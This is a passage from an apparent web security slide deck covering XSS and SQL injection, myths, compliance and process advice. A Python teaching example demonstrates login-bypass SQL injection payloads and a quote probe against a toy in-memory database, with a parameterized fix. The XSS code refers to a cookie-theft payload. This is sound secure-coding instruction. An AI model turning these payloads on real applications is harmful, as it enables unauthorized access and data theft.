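    """Scanner-style check: send a marker payload and see whether it comes back
    byte-for-byte (still live markup) rather than entity-encoded."""
    return probe in render(probe)


if __name__ == "__main__":
    for label, fn in [("body, vulnerable", render_search_vulnerable),
                      ("body, fixed", render_search_fixed)]:
        print(f"{label}: reflected unencoded = {reflects_unencoded(fn, COOKIE_THEFT)}")
    for label, fn in [("attribute, vulnerable", render_input_vulnerable),
                      ("attribute, fixed", render_input_fixed)]:
        print(f"{label}: reflected unencoded = {reflects_unencoded(fn, ATTR_BREAKOUT)}")
    print(render_input_fixed(ATTR_BREAKOUT))
```

html.escape is the right encoder only for the HTML body and quoted-attribute contexts; data landing inside a JavaScript string, a URL, or CSS needs the encoder for that context. Marking the session cookie HttpOnly keeps document.cookie out of the script's reach, but does nothing against the keystroke logging or the requests the script can send on the victim's behalf.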
SQL Injection

• What is it?: Database contents are disclosed or modified by specially crafted form input that changes the logic of the SQL query the application builds from that input.
• Root Cause: SQL statements are assembled by concatenating untrusted input, so the input is parsed as SQL syntax. Sanitizing, rejecting, or escaping SQL metacharacters is a fragile substitute for parameterized queries.
Impacts of SQL Injection

• Customer information: the attacker can read every customer record the application's database account can see
• Public defacement: by injecting script into content that many pages render from the database, one attack can deface thousands of sites
• Database server: where the database exposes command execution or file access through SQL, the attacker can compromise the database server itself
• Bypass log-in: with simple SQL fragments in the username or password field, the attacker gets past the credential check
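An added example (mine, not this deck's code) that carries the log-in bypass above through in Python against an in-memory SQLite table: the string-built query, the same query parameterized, and the single-quote error probe a black-box scanner sends to tell the two apart. The users, passwords and payloads are constructed test data.

```python
import sqlite3

# Constructed payloads for the "Bypass log-in" impact above.
BYPASS_USER = "admin'--"    # closes the string, then comments out the password clause
TAUTOLOGY = "' OR '1'='1"   # turns the WHERE clause into something always true


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed test rows (not real data). Passwords are
    stored in clear only so the injection stays visible; real code compares a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "correct horse", "admin"), ("alice", "s3cret", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Assembles the statement by string formatting, so input is parsed as SQL."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, username: str, password: str):
    """Parameterized: the values travel separately from the SQL text and can
    never change the statement's structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def smells_injectable(login, conn) -> bool:
    """Error-based probe of the kind a black-box scanner sends: a lone single
    quote breaks the syntax only if the input was concatenated into the SQL."""
    try:
        login(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment bypass:", login_vulnerable(db, BYPASS_USER, "anything"))
    print("vulnerable, tautology:    ", login_vulnerable(db, "nobody", TAUTOLOGY))
    print("fixed, comment bypass:    ", login_fixed(db, BYPASS_USER, "anything"))
    print("fixed, real credentials:  ", login_fixed(db, "alice", "s3cret"))
    print("quote probe, vulnerable:  ", smells_injectable(login_vulnerable, db))
    print("quote probe, fixed:       ", smells_injectable(login_fixed, db))
```

The comment payload returns the admin row without a password; the tautology returns whichever row the engine scans first. The parameterized version returns nothing for both and raises no error for the lone quote, which is exactly why a scanner's quote probe stays quiet against it.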
Top 5 Web Security Myths

• "I have SSL, so that'll protect my Web site"
  • SSL ≠ App Security: it encrypts the connection, and XSS and SQL injection ride over it just as well
• "We have never been hacked"
  • How do you know?
• "We are PCI compliant"
  • Heartland, Hannaford… both were breached while compliant
• "I can test a few of my Web applications once a year"
  • Any vulnerable site is your weakest link
• "It's too expensive"
  • Many flexible options to get you started
Top Reason #1: Web Applications Are Getting More Complex

• Web 2.0 technologies exacerbate the problem
  • Think you are not using Web 2.0? Think again!
• e.g. software mashups
  • How do you know any of the original apps is secure?
  • How do you know the resulting app does not include new vulns?
Top Reason #2: Compliance Pressure Isn't Letting Up (PCI, SOX, GLBA, HIPAA, FFIEC, …)

• Each regulation may have some level of implication for application security
• PCI DSS Requirement 6 has specific provisions for Web application security (6.6: application-layer vulnerability assessment, or a Web application firewall, for public-facing Web applications)
• We expect more regulations to follow suit
  • California AB 211, section 1, 56.36 (b)
Top Reason #3: Third-Party Code Is Prevalent

• Outsourced, open-source, and packaged applications
• Enterprises use more open-source code than they know
  • Apache, Net-SNMP, zlib, JBoss
• Few software outsourcing providers have secure-coding provisions or service-level guarantees
• Do you know the security quality of third-party code and apps?
Application Security Maturity Model

[Figure: a 2x2 matrix. Vertical axis: Tools & Technology (Low to High). Horizontal axis: People & Process (Low to High). Quadrant labels: Panic, Scramble, Pit of Despair, Security as Core Business Process.]

Enterprise Security Challenge

[Figure: at the top, the C-level asks "Will I get hacked?"; Information Security sits between the C-level and the business units. Each business unit has its own Dev and QA teams and its own applications (App 1, App 2, App 3), spanning pre-production (Dev, QA, Staging) and production.]

Web & Software Security Lifecycle

[Figure: timeline from Training and Planning through Dev Begins, Alpha/Beta, Production/Launch, update1, update2, ..., with Scanning/Testing spanning the whole timeline.]

Application Security is NOT a One-Time Event but a Discipline Over Time!

SDLC & Black Box Testing

[Figure: Software Development Life Cycle phases Design, Build, Deploy, Operate, with the security activities placed along them: Code Review; Build & Test Automation; White Box Testing; Black Box Testing; Pen Test; Decision Support & Process Optimization.]
You May Have To Change Internal Procedures & Processes

• Buy-in
  • Management
  • Grass roots
• Create a dedicated application security role
  • Align this role with business, operations, development and QA
  • Define responsibility and accountability structure
• Engage business to define priorities, standards, and policies
  • Seat at the table…

You May Have To Change Internal Procedures & Processes (continued)

• Move certain security functions into operations
  • Security measures must be simple enough for non-experts
  • Must integrate with existing operational procedures and tools
• Metrics
  • Implement reporting and metrics to measure risk
  • Identify technology solutions/services that will provide meaningful metrics
  • Review, rinse, repeat
  • START!
Final Thoughts

• This is real
• Bad guys are getting smarter
• Think about process/strategy
• Test frequently
• Starting early = less $$

Jon Zucker
jon@cenzic.com
www.Cenzic.com | 1-866-4-CENZIC (1-866-423-6942)